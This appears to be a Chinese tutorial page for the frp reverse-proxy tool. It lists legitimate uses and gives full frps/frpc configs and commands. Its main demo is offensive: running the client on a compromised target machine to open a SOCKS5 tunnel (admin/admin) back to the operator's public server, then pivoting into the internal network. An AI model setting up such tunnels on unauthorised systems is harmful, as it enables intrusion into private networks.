简介

frp 是一款高性能的反向代理应用，专注于内网穿透。它支持多种协议，包括 TCP、UDP、HTTP、HTTPS 等，并且具备 P2P 通信功能。使用 frp，您可以安全、便捷地将内网服务暴露到公网，通过拥有公网 IP 的节点进行中转。

使用场景

1. 渗透内网机器：当通过打点进入到目标内网后，在内网机器启动frp客户端连接公网frp服务端，即可通过您的公网机器对目标内网环境进行扫描。
2. 内网穿透：在企业网络环境中，您可能有一些内部服务需要对外提供访问，比如内部网站、应用程序等。使用 FRP 可以轻松地实现内网穿透，让外部用户通过公网访问内部服务，而无需直接暴露内网的 IP 地址。
3. 轻量级代理服务：FRP 还可以用作轻量级的代理服务，通过端口转发功能，将公网上的请求转发到内部服务器上，以实现负载均衡、流量控制等功能。

演示案例

---

服务端配置文件：frps.toml

[common]
 # FRP 服务端监听端口
bind_port = 65535
# 开启 token 增加安全性
token = b91fa07e-2036-4a0b-9a1c-b6f04055279c

客户端配置文件：frpc.toml

[common]
 # 要连接公网服务器的IP
server_addr = <YOUR IP Address>  
# 对应frps的bind_port，也就是frps的监听端口
server_port = 65535
# 与frps的token一致    
token = b91fa07e-2036-4a0b-9a1c-b6f04055279c

[socks5_proxy]              
type = tcp
# 启用SOCKS5插件     
plugin = socks5    
# 主控公网服务端暴露的SOCKS端口
remote_port = 65534
# SOCKS用户名         
plugin_user = admin         
# SOCKS密码
plugin_passwd = admin      

---

先在自己的公网中转服务器上放入 frps 和 frps.toml，然后启动frp的服务端。

frps -c frps.toml

在目标渗透服务器上放入 frpc 和 frpc.toml，然后启动frp的客户端来连接frp的服务端。

frpc -c frpc.toml

---

当frp的客户端和服务端都启动后，说明socks5隧道已建立好，接下来用自己客户端连接自己公网中转服务器的socks5端口即可，根据示例配置，socks5连接信息如下。

IP: <YOUR  Server IP Address>  
Port: 65534
username：admin
password：admin

连接好socks5隧道后，就相当于客户端 = 目标内网服务器的网络环境，就可以进行内网渗透了。

使用说明

• 官方文档：frp (gofrp.org)

下载

✈️ 全球下载通道

🚀 极核加速通道